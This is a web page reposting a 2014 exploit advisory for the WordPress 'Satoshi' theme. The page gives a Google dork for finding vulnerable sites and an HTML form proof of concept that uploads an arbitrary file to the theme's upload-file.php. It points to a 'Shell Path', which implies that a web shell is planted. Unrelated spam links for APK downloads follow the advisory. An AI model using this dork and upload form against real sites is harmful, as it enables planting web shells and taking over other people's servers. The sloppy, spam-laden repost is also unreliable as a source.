Satoshi Theme – File Upload CSRF

In XIAOMI 44 views
#- Title: Satoshi Theme – File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:”/Themes/satoshi/”
#- Fixed in Version : –
#- Tested on : linux
======================================================

Classification
Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous
Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709
— Proof Of Concept —

When vuln : –

CSRF : 

<form enctype=”multipart/form-data”

action=”http://target .com/wp-content/themes/satoshi/upload-file.php” method=”post”>
Your File: <input name=”uploadfile” type=”file” /><br />
<input type=”submit” value=”upload” />
</form>
If Succes  : Succes
Shell Path : Here

Tags: #CSRF #File Upload #Wordpress

Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk
Download Pes 2018 Android Release APK terbaru
Download Pes 2018 Android Release APK terbaru
Download FTS Mod PES 2018 APK +
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga APK v0.14.1 Terbaru– Rumah Android
Must read×

Top
error: Content is protected !!